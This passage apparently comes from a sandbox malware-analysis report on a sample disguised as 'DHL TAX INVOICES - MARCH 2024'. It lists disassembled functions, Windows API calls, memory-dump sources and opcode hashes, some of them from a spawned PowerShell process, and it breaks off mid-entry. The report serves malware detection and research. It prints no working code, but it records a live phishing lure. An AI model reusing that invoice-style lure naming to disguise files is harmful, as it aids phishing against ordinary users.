                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrlen
                                                            • String ID: C:\Users\user\Desktop
                                                            • API String ID: 2709904686-224404859
                                                            • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                            • Instruction ID: 87bbc210c64b19a6b78a00595756172ded5dec919d443e3f73ce50da7c0279be
                                                            • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                            • Instruction Fuzzy Hash: D4D05EB24009209AD312AB04DD00DAF77ACEF163007464426E841AB166D778BC8186BC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405CB8 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC8
                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CE0
                                                            • CharNextA.USER32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CF1
                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CFA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                            • Instruction ID: b09c91cad7c2282b041c35ea214dbdd3f15ee75aa50bf55fe933874c09a5e2ef
                                                            • Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                            • Instruction Fuzzy Hash: BFF0F631104954FFD702DFA5DD04E9FBBA8EF06350B2180BAE841F7210D674DE01ABA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Executed Functions

                                                            Function 0702CF18 Relevance: 8.0, Strings: 5, Instructions: 1706COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q
                                                            • API String ID: 0-4202989938
                                                            • Opcode ID: 52a0c35fef672637659feb1dd315a6d68e945ccfb65a89fe2bcc89bc4753af5a
                                                            • Instruction ID: f56d0dd6f4d7f58b007357117f876707ae3cd344272ca762394a98c21ef592db
                                                            • Opcode Fuzzy Hash: 52a0c35fef672637659feb1dd315a6d68e945ccfb65a89fe2bcc89bc4753af5a
                                                            • Instruction Fuzzy Hash: D4F27FB4A00328DFDB60DB64C955BDEB7B2BB85304F1085A9E409AB751CB31ED86CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008FF4F8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \V&k
                                                            • API String ID: 0-3507488496
                                                            • Opcode ID: 572ca32f1bc5d9055eec506532dd13fc161eab3846cb0f7ed16fd65bf758e4dd
                                                            • Instruction ID: e68ee2cc8726146c01c861afaba456bd261c9792287cb7b9a809a9f85b7f5891
                                                            • Opcode Fuzzy Hash: 572ca32f1bc5d9055eec506532dd13fc161eab3846cb0f7ed16fd65bf758e4dd
                                                            • Instruction Fuzzy Hash: C8B10770E1020D8FDB10DFA9D8857ADBAF2FF88354F248139EA15E7295EB749845CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07021718 Relevance: 19.9, Strings: 15, Instructions: 1181COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-2338339476
                                                            • Opcode ID: bde1882b338726bf060cf80d43b76ad5d98c81bec586914b163a4e6aa268bab3
                                                            • Instruction ID: 84de96253d9e98683aab4a9c0dfc8d05602b7907748f43fd61173076181d053e
                                                            • Opcode Fuzzy Hash: bde1882b338726bf060cf80d43b76ad5d98c81bec586914b163a4e6aa268bab3
                                                            • Instruction Fuzzy Hash: C592B1B2B00229DFCB54CF98C844A6ABBF2BF85310F15C56AE8159B355CB32DC46DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008FBA08 Relevance: 9.2, Strings: 7, Instructions: 462COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Hbq$h]&k$h]&k$h]&k$$^q$$^q$I&k
                                                            • API String ID: 0-1728492426
                                                            • Opcode ID: 42042fe7a96a0e71915a0e929dabfcdb3af44a4257f8150f9451762a2445ab45
                                                            • Instruction ID: 90bd93426b47e5a6e9ead729cb7837df8d38b85bc8cc16629d3f3cf4dd503383
                                                            • Opcode Fuzzy Hash: 42042fe7a96a0e71915a0e929dabfcdb3af44a4257f8150f9451762a2445ab45
                                                            • Instruction Fuzzy Hash: BC122B34B0022C8FCB25DB35C9946AEB7B6FF89304F1080A9D509AB365DB359E85CF85
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07020850 Relevance: 6.8, Strings: 5, Instructions: 592COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                            • API String ID: 0-3272787073
                                                            • Opcode ID: d1367a5d7b62154363c32fe3dea842d047bfefa320bd6b8049ba3997567f410e
                                                            • Instruction ID: c780564db73573f82f196c07f4e30a83e884683985f67651e36d0b63f37451c0
                                                            • Opcode Fuzzy Hash: d1367a5d7b62154363c32fe3dea842d047bfefa320bd6b8049ba3997567f410e
                                                            • Instruction Fuzzy Hash: A0126DB27043668FCB658B29884066BBBE2AFC2314F24C5ABD455CF351DB32C847D7A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07025C38 Relevance: 5.4, Strings: 4, Instructions: 373COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                            • API String ID: 0-1420252700
                                                            • Opcode ID: 511872450c0b60baf04c8487cf8a266d75ebb5ed152615b8b490c22a1501b9a5
                                                            • Instruction ID: e2dffdfe2fae4bc3f76b9ede82437b7170a65db3b9fd98eea49fefac2ac12ed4
                                                            • Opcode Fuzzy Hash: 511872450c0b60baf04c8487cf8a266d75ebb5ed152615b8b490c22a1501b9a5
                                                            • Instruction Fuzzy Hash: E5E1B2B1B002288FCB54DB58C955B5FBBB2AF88304F24C569E4056F355CB72EC46CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0702DB69 Relevance: 4.8, Strings: 3, Instructions: 1096COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$4'^q
                                                            • API String ID: 0-1196845430
                                                            • Opcode ID: 19a01436ee90d5b696851806e2e9f6a5a28cb10ea4759a08dc9e64993770a949
                                                            • Instruction ID: 6838c8260d22f220d3cb1507f37cb8bba6b6009eb707b473128919d917051fa4
                                                            • Opcode Fuzzy Hash: 19a01436ee90d5b696851806e2e9f6a5a28cb10ea4759a08dc9e64993770a949
                                                            • Instruction Fuzzy Hash: FFB271B5A00328DFCB64DB54C951B9EBBB2BF89304F1085A9E4096B355CB31ED86CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07024002 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q
                                                            • API String ID: 0-2697143702
                                                            • Opcode ID: e2039e5399a6ae98b2dd291e6d70edfd59ecc3af0f7fbc9da538265b13a4a2a7
                                                            • Instruction ID: bbb5f47df6f87f445e00bddce8ef36caa5e8729ffcc869ec14f2d7708b971a32
                                                            • Opcode Fuzzy Hash: e2039e5399a6ae98b2dd291e6d70edfd59ecc3af0f7fbc9da538265b13a4a2a7
                                                            • Instruction Fuzzy Hash: 3452B2B5A00224CFC764DB54C951B9AB7F3BF85304F5089A9E50AAB741CB31ED86CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07025C1A Relevance: 2.8, Strings: 2, Instructions: 316COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q
                                                            • API String ID: 0-2697143702
                                                            • Opcode ID: 867225f4db377ad9a375698e445fbbf76221ef1de372728614a7ee2fbe9cdb5a
                                                            • Instruction ID: a7b6f42e7582bb01bfb15fd6fc9efeb287595d33cb3ebf5b12706f81a38f1c7d
                                                            • Opcode Fuzzy Hash: 867225f4db377ad9a375698e445fbbf76221ef1de372728614a7ee2fbe9cdb5a
                                                            • Instruction Fuzzy Hash: 82C1D4B1A002259FCB54DF54C841B9EBBF2AF84304F25C599E4056F396CB32EC46DBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07020D08 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $^q$$^q
                                                            • API String ID: 0-355816377
                                                            • Opcode ID: c93514fcb1bbcb02bb4d9017b6baa10ceaacc37bd6ceebeaa78b619ec5833f32
                                                            • Instruction ID: 701773123a90ba98118fa638fb6e0893b82e5d67ff7daf74ab19f516ee0edb6c
                                                            • Opcode Fuzzy Hash: c93514fcb1bbcb02bb4d9017b6baa10ceaacc37bd6ceebeaa78b619ec5833f32
                                                            • Instruction Fuzzy Hash: ED11DAB66013299FDB548E15C444A7AB7F5AF80624F158616E8148F251C732E847D750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07024A38 Relevance: 2.1, Strings: 1, Instructions: 804COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q
                                                            • API String ID: 0-1614139903
                                                            • Opcode ID: 7e8dc0725f765a313df36ee36b960f1914e3d64c5a7ac622670ffda174aabe5e
                                                            • Instruction ID: acd0c8925eb86cebf7589c0f7aebd0030dc8d984b4074de34fbe0a0b373f2034
                                                            • Opcode Fuzzy Hash: 7e8dc0725f765a313df36ee36b960f1914e3d64c5a7ac622670ffda174aabe5e
                                                            • Instruction Fuzzy Hash: C372B1B5A00225CFDB60DB54C951BAAB7F2BF85304F5085A9E80A6B741CB31ED86CF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07024C50 Relevance: 2.0, Strings: 1, Instructions: 718COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q
                                                            • API String ID: 0-1614139903
                                                            • Opcode ID: 64265a0ce45f768f840defaed2836415de46d6bff5d9e8e0092b02174d9aae74
                                                            • Instruction ID: 9b6135c94206818b26777e09d4ea24602c5bdba5121d7a278e2fe95d59e29377
                                                            • Opcode Fuzzy Hash: 64265a0ce45f768f840defaed2836415de46d6bff5d9e8e0092b02174d9aae74
                                                            • Instruction Fuzzy Hash: CC62C2B5A00225CFDB60DB54C941F9AB7F2BF85304F1085A9E90A6B741CB31ED86CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07024BF3 Relevance: 1.8, Strings: 1, Instructions: 560COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q
                                                            • API String ID: 0-1614139903
                                                            • Opcode ID: 4275466c504e739185a013e51f4ae571ed1837c0989ffdf1101a33ec58b6b6fe
                                                            • Instruction ID: 66f8f9c2099e3acc3880b3d769aca9c60c17502b55eb9d42aa28bb563920a9e0
                                                            • Opcode Fuzzy Hash: 4275466c504e739185a013e51f4ae571ed1837c0989ffdf1101a33ec58b6b6fe
                                                            • Instruction Fuzzy Hash: A832C0B5A00225CFCB64DB54C941F9AB7F2BF85304F5089A9E50A6B741CB31ED86CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0702DD81 Relevance: 1.8, Strings: 1, Instructions: 558COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q
                                                            • API String ID: 0-1614139903
                                                            • Opcode ID: 57a6cadbde149cc9866ba68b9ec4f91ec2d724fcec749c71621c766a27ed131f
                                                            • Instruction ID: 528d8eb2d40128b3a6111d3168292515a5ccbe07e89b584f61818595c1156a55
                                                            • Opcode Fuzzy Hash: 57a6cadbde149cc9866ba68b9ec4f91ec2d724fcec749c71621c766a27ed131f
                                                            • Instruction Fuzzy Hash: A9426DB1A40325CFDBA0DB14C994BAEB7B2BB45304F1085E9E409AB790CB31ED86DF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0702DD36 Relevance: 1.8, Strings: 1, Instructions: 536COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q
                                                            • API String ID: 0-1614139903
                                                            • Opcode ID: d033eaccf96478b9fec0fc891a7170b60057dcf9be8c36547f1d443e3bd5a26d
                                                            • Instruction ID: dcef219565235e6b9790e3f88dcdd22ac3daae50e9b1b36e6b780f6114effbdf
                                                            • Opcode Fuzzy Hash: d033eaccf96478b9fec0fc891a7170b60057dcf9be8c36547f1d443e3bd5a26d
                                                            • Instruction Fuzzy Hash: DA3270B5A00328DFC764DB54C951B9EBBB2BB85304F5085A9E80A6B741CB31ED86CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0702DFC8 Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q
                                                            • API String ID: 0-1614139903
                                                            • Opcode ID: a65cb2cac2565e5ce64f9f914d5a6a0cbcf5b25fff93f9b7cfc2768896c77f79
                                                            • Instruction ID: 5da7b1d531bbc91ca02913082b03fd5b121737d4319d29db2dd32fb3fad38708
                                                            • Opcode Fuzzy Hash: a65cb2cac2565e5ce64f9f914d5a6a0cbcf5b25fff93f9b7cfc2768896c77f79
                                                            • Instruction Fuzzy Hash: 35125EB5A40325CFDBA0DB14C894BADB7B2BB45304F0085E9E51AAB791CB31ED82DF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07020834 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q
                                                            • API String ID: 0-1614139903
                                                            • Opcode ID: 1b96c1c182e9f4bd04591a8b8af9095c9fa88e8cebed34c7da1523ce80864ee3
                                                            • Instruction ID: b0f672729df30217b5567641218ecbce9acaeb98c5f6e04ab1e730f9a0d5527d
                                                            • Opcode Fuzzy Hash: 1b96c1c182e9f4bd04591a8b8af9095c9fa88e8cebed34c7da1523ce80864ee3
                                                            • Instruction Fuzzy Hash: 5211A5B29093969FD7528F6488106ABBFF1DF47210F1942DBC498CB152D7348982D7E2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07024F60 Relevance: .7, Instructions: 680COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a61c1d23249aa09ee35eb4f238deb739b69785b85dcc395c94d66db4ab435dfa
                                                            • Instruction ID: da2a8dd737a80d54b797ef2479d35673f5b78836689624ccb78416ab540ebf32
                                                            • Opcode Fuzzy Hash: a61c1d23249aa09ee35eb4f238deb739b69785b85dcc395c94d66db4ab435dfa
                                                            • Instruction Fuzzy Hash: C9528BB1B00214DFC754CB98C885E6EBBB2BF85304F24C5A9E8059B365CB72EC46CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 070255DC Relevance: .5, Instructions: 465COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80704dd4f521fe8bcfb291898f9eec0fc7e9d4503103086c1181faf26ac85eb1
                                                            • Instruction ID: 32361d91140c61ea71807eb20ce8bad10d55575545567aed9613739695da2fab
                                                            • Opcode Fuzzy Hash: 80704dd4f521fe8bcfb291898f9eec0fc7e9d4503103086c1181faf26ac85eb1
                                                            • Instruction Fuzzy Hash: 66127DB5A00215DFC754CB88C885E6DBBB2FF85304F24C6A9E8159B361CB72ED46CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07021BE6 Relevance: .4, Instructions: 422COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a52c78340a14789466937ece83b3a6b9209044bbdc0402f45a908ac92179e158
                                                            • Instruction ID: a225fcdbaa36a6ca50054ccf934519c7cea1b43c3b33d0de660db44012990b8d
                                                            • Opcode Fuzzy Hash: a52c78340a14789466937ece83b3a6b9209044bbdc0402f45a908ac92179e158
                                                            • Instruction Fuzzy Hash: BB027CB5A00219DFDB54CB58C481E69BBF2FF89304F24C169E809AB355CB72EC46CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07021700 Relevance: .4, Instructions: 399COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2318746078.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7020000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5025b52e75ebdc990975d1bf65ea8a62ceacf378b7d419867eeba3c7651e1d16
                                                            • Instruction ID: 5a37e2949750f5f9ab1026e16eabc04d93c4bfe882d16553322b5555255863ee
                                                            • Opcode Fuzzy Hash: 5025b52e75ebdc990975d1bf65ea8a62ceacf378b7d419867eeba3c7651e1d16
                                                            • Instruction Fuzzy Hash: BAF15CB5A00219DFCB54CB58C481E9DBBF2BF89314F15C169E819AB355CB32EC46CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008FAEE0 Relevance: .3, Instructions: 334COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3919aa1d8f0c037387b64f8aabf240c5de9f43fdc4308e6d10f10dafd9f08500
                                                            • Instruction ID: a87137c984a930501a8b6320afd9b223748866d15aad366a022d33d3d9c45420
                                                            • Opcode Fuzzy Hash: 3919aa1d8f0c037387b64f8aabf240c5de9f43fdc4308e6d10f10dafd9f08500
                                                            • Instruction Fuzzy Hash: 2DE1F574A00209DFDB15CFA8D584AAEBBB2FF88310F258559E914EB365C731ED81CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F7420 Relevance: .3, Instructions: 266COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f98bf7e7d815fbb2932065178c5062e06a5f6257f19a65b7280dc2a1e13a5240
                                                            • Instruction ID: ff23d10534b3eea52b6155297d6f21f671ab64c579af4baf18df77993859119d
                                                            • Opcode Fuzzy Hash: f98bf7e7d815fbb2932065178c5062e06a5f6257f19a65b7280dc2a1e13a5240
                                                            • Instruction Fuzzy Hash: ACA18D31A142089FEB14DFB5C944AADBBF2FF84304F218528E506EB365DB74AD49CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F7B70 Relevance: .2, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2314014633.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8f0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 62ca61eb29ab0e2dbe7e9d9b3c812dcdf83a4e2eeab0655cebe9849568cd300d
                                                            • Instruction ID: e6061aadea6dc8e2803c1a57da00ca37a9720baab4a3e5d04bfd293e1027f03e
